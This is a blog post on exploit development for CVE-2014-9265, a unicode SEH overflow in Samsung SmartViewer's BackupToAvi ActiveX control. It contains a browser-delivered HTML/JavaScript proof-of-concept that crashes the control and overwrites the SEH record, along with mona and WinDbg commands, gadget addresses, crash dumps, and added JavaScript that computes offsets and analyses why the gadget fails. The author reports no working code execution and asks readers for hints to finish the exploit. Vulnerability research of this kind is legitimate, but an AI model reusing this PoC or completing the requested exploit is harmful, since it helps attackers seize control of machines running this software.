Sunday, January 18, 2015

Samsung SmartViewer BackupToAvi Remote Code Execution PoC (CVE-2014-9265)

This blog is about CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."

Let's load the single vulnerable DLL, C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll, into Immunity Debugger.

The mona plugin's help can be viewed with the command below; the two commands used in this post are:
!mona
           modules / mod        | Show all loaded modules and their properties
           unicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow
The following displays the list of all loaded modules and their properties (Rebase, SafeSEH, ASLR, NXCompat). Of the modules shown in the output, CNC_Ctrl_STW.dll is the only one with all of these set to False, which is why the pop/pop/ret address is taken from it:
!mona modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Module info :
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    0x774d0000 | 0x7754b000 | 0x0007b000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [COMDLG32.dll](C:\Windows\system32\COMDLG32.dll)
0BADF00D    0x10000000 | 0x1017b000 | 0x0017b000 | False  | False   | False |  False   | False  | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D    0x75c60000 | 0x75d34000 | 0x000d4000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)

!mona ua
generates venetian_alignment.txt (alignment code for the unicode case, where every second byte of the payload is 00) at C:\Program Files\Immunity Inc\Immunity Debugger\

The mona command to search for pop/pop/ret sequences (# separates the instructions and * allows arbitrary instructions in between):
!mona findwild -s "pop r32#*#pop r32#*#retn"
The command above writes its results to findwild.txt, located at
C:\Program Files\Immunity Inc\Immunity Debugger\

Of the results, only one address (shown below) from the non-ASLR module is tagged by mona as having some form of unicode compatibility. Note that the tag is unicodereverse, not unicode: 0x10008700 has its zero bytes in the upper half of each 16-bit word (0xXX00YY00), while a buffer of single-byte characters expanded to UTF-16 can only place dwords of the form 0x00XX00YY in memory. This is exactly why the crashes further down show EIP = 0x00100087 rather than 0x10008700.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)

A conditional breakpoint on the gadget can be set in WinDbg with the command below. It assumes EIP reaches 0x10008700; as the crashes below show, EIP actually gets 0x00100087, so the breakpoint is never reached on this path.
bp 10008700 "j @eip=0x10008700 ; 'g' "

Finding the offset to the SEH record (and thus to EIP)
First pass a string of 15000 characters to the BackupToAvi method, then use a Metasploit cyclic pattern (pattern_create.rb, with pattern_offset.rb for the lookup) to find the offset at which the exception registration record is overwritten; in my case it is offset 156. To find the offset, run !exchain, which lists the overwritten record (at address 0x045ad62c in the run below), dump the bytes at that address, and look the pattern characters found there up in the cyclic pattern. Note that the control expands the string to UTF-16, so the dump shows each character followed by a 00 byte, and the offset is counted in characters of the original string (156 characters, 312 bytes).
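The offset lookup described above, as an added example (my code, not the author's PoC): it builds the same kind of cyclic pattern Metasploit's pattern_create.rb produces, models the UTF-16 expansion the dumps show, and recovers the offset from the 8 bytes one would read at the exception registration record. It assumes, as the post's dumps show, that the control expands each single-byte character to two bytes (character, 00) and that the record sits 156 characters into the buffer.

```javascript
// Added example, not code from the original post: a Metasploit-style cyclic pattern
// (the pattern_create.rb / pattern_offset.rb scheme) and the lookup step for a buffer
// that the target expands to UTF-16LE before the SEH record is overwritten.
// Assumptions: the expansion is ANSI -> UTF-16LE (each character followed by 0x00),
// as the WinDbg dumps in the post show, and the record sits 156 characters in.

// Metasploit's triple alphabet: "Aa0Aa1Aa2...". The pattern only repeats after
// 26 * 26 * 10 triples = 20280 characters, which covers the 15000-character buffer.
function patternCreate(length) {
  var upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  var lower = "abcdefghijklmnopqrstuvwxyz";
  var digits = "0123456789";
  var out = "";
  for (var a = 0; a < upper.length && out.length < length; a++) {
    for (var b = 0; b < lower.length && out.length < length; b++) {
      for (var c = 0; c < digits.length && out.length < length; c++) {
        out += upper[a] + lower[b] + digits[c];
      }
    }
  }
  return out.substring(0, length);
}

// Offset (in characters) of a 4-character sample inside the pattern, -1 if absent.
function patternOffset(pattern, sample) {
  return pattern.indexOf(sample);
}

// Input: the 8 bytes WinDbg shows at the exception registration record (nSEH + SEH).
// A UTF-16 expanded ASCII buffer leaves a 0x00 after every character, so drop the
// interleaved nulls to recover 4 consecutive pattern characters, then look them up.
function offsetFromSehDump(pattern, dumpBytes) {
  var chars = "";
  for (var i = 0; i < 8; i += 2) {
    if (dumpBytes[i + 1] !== 0x00) {
      return -1; // high byte set: not a plainly expanded single-byte buffer
    }
    chars += String.fromCharCode(dumpBytes[i]);
  }
  return patternOffset(pattern, chars);
}

// Constructed walk-through: the 15000-character pattern, expanded the way the control
// does it, read back at character offset 156 (byte offset 312 of the expanded buffer).
function demo() {
  var pattern = patternCreate(15000);
  var dump = [];
  for (var k = 156; k < 160; k++) {
    dump.push(pattern.charCodeAt(k), 0x00); // what "d <record address>" would show
  }
  return offsetFromSehDump(pattern, dump); // 156
}
```

In a real run the 8 bytes passed to offsetFromSehDump are copied from the WinDbg "d" output at the address !exchain reports; the -1 branch catches the case where the buffer was not expanded as assumed, in which case the offset has to be computed from the raw bytes instead.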

Once we know the offset to nSEH and SEH we can write a PoC as shown below:
<html>
<head>
<title>Samsung SmartViewer BackupToAvi Remote Code Execution - PoC developed by Praveen Darshanam</title>
</head>
<body>
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target'>
</object>

<script>
 var payload_length = 15000;
 var arg1 = 1;
 var arg2 = 1;
 var arg3 = 1;
 // blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 // offset to the SEH record is 156 characters (312 bytes once expanded to UTF-16),
 // found with the Metasploit cyclic pattern
 for (var i = 0; i < 156; i++)
 {
  buf1 += "A";
 }

 var nseh = "DD";
 // address in the vulnerable DLL (no ASLR/SafeSEH): 0x10008700, pop ecx # mov eax,esi # pop esi # retn 4
 // (this 2-character string is stored as the bytes 87 00 10 00, see Issue 2 below)
 var seh = "\x87\x10";
 junk = buf1 + nseh + seh;

 // fill the remaining buffer
 for (var j = 0; j < (payload_length - junk.length); j++)
 {
  buf2 += "B";
 }
 var fbuff = junk + buf2;
 target.BackupToAvi(arg1, arg2, arg3, fbuff);
</script>
</body>
</html>
When the HTML file above is opened in the browser with WinDbg attached, we get the trace below. For this run the SEH slot held "EE" rather than "\x87\x10", as the 45 00 45 00 at the SEH record and EIP = 00450045 show.
Tested on Windows 7 Ultimate N SP1 using Internet Explorer 8.

(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
00450045 ??              ???

0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044

0:005> d 045ad62c
045ad62c  44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00  D.D.E.E.B.B.B.B.
045ad63c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad64c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad65c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad66c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad67c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad68c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad69c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.

I couldn't write a working exploit because of the issues mentioned below.
Issue 1:
None of the registers point to the controlled buffer at the time of the crash; this can be verified with "d reg_name" on the WinDbg command line, where reg_name is eax, ebx, esp, edi, etc.

With the gadget address in the SEH slot:
var nseh = "DD";
var seh = "\x87\x10";      //0x10008700
the SEH record reads:
045ad62c  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.

Issue 2:
0x10008700 points to the pop/pop/ret gadget, but EIP gets 0x00100087 instead of 0x10008700.

Issue 2 also occurs on Windows XP Pro SP3:
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00  D.D.....B.B.B.B.
020bf7a8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7b8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7c8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7d8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7e8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7f8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf808  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
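The byte-level reason for Issue 2, as an added example (my code, not the author's PoC): it lays the buffer out exactly as the PoC does, shows the bytes that land in the SEH record and the dword the exception dispatcher reads from it, and adds a check for which addresses a two-character string can produce at all. It assumes, as the dumps on this page show, that the control stores the argument as UTF-16LE with a 00 after every single-byte character and that the record is 156 characters in.

```javascript
// Added example, not code from the original post: the byte-level reason the handler
// address 0x10008700 lands in EIP as 0x00100087, and a check for the addresses a
// two-character string can actually produce. Assumes, as the dumps show, that the
// control stores the argument as UTF-16LE and that the SEH record is 156 characters in.

// UTF-16LE bytes of a JavaScript string, as the control sees them.
function utf16Bytes(str) {
  var bytes = [];
  for (var i = 0; i < str.length; i++) {
    var code = str.charCodeAt(i);
    bytes.push(code & 0xff, (code >> 8) & 0xff);
  }
  return bytes;
}

// The dword the exception dispatcher reads from a handler slot: 4 bytes, little-endian.
function dwordAt(bytes, index) {
  return (bytes[index] | (bytes[index + 1] << 8) | (bytes[index + 2] << 16) | (bytes[index + 3] << 24)) >>> 0;
}

function hex32(value) {
  return "0x" + ("00000000" + (value >>> 0).toString(16)).slice(-8);
}

// Lay the buffer out as the PoC does (156 x "A", then nSEH, then SEH) and report what
// ends up in the SEH record and therefore in EIP.
function sehRecordView(nseh, seh) {
  var buf = "";
  for (var i = 0; i < 156; i++) {
    buf += "A";
  }
  buf += nseh + seh;
  var bytes = utf16Bytes(buf);
  var at = 156 * 2; // byte offset of the record in the expanded buffer
  return {
    nsehBytes: bytes.slice(at, at + 4),
    sehBytes: bytes.slice(at + 4, at + 8),
    eip: hex32(dwordAt(bytes, at + 4))
  };
}

// Only addresses of the form 0x00XX00YY (bytes YY 00 XX 00 in memory) can be written
// by two single-byte characters that get expanded to UTF-16. Returns the 2-character
// string that produces the address, or null when the address does not have that form,
// which is the case for 0x10008700 (zero bytes in the other halves: 0xXX00YY00).
function unicodeStringFor(address) {
  if (((address >>> 8) & 0x00ff00ff) !== 0) {
    return null;
  }
  var first = address & 0xff;           // lowest byte, first character
  var second = (address >>> 16) & 0xff; // third byte, second character
  return String.fromCharCode(first) + String.fromCharCode(second);
}
```

sehRecordView("DD", "\x87\x10") reproduces the 44 00 44 00 87 00 10 00 dump and EIP = 0x00100087 from the page, and sehRecordView("DD", "EE") reproduces EIP = 0x00450045 from the first trace; unicodeStringFor(0x10008700) returns null because the address has the unicodereverse shape rather than the 0x00XX00YY shape this check requires, so it is a quick filter to run over findwild.txt before picking a gadget. The check assumes single-byte characters are what reach the control; whether a character above 0xFF would keep its high byte (and so place a 00 in the low position) depends on how the BSTR is handled on the way in, which would have to be verified in the debugger.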

Any hints to develop working exploit are most welcome!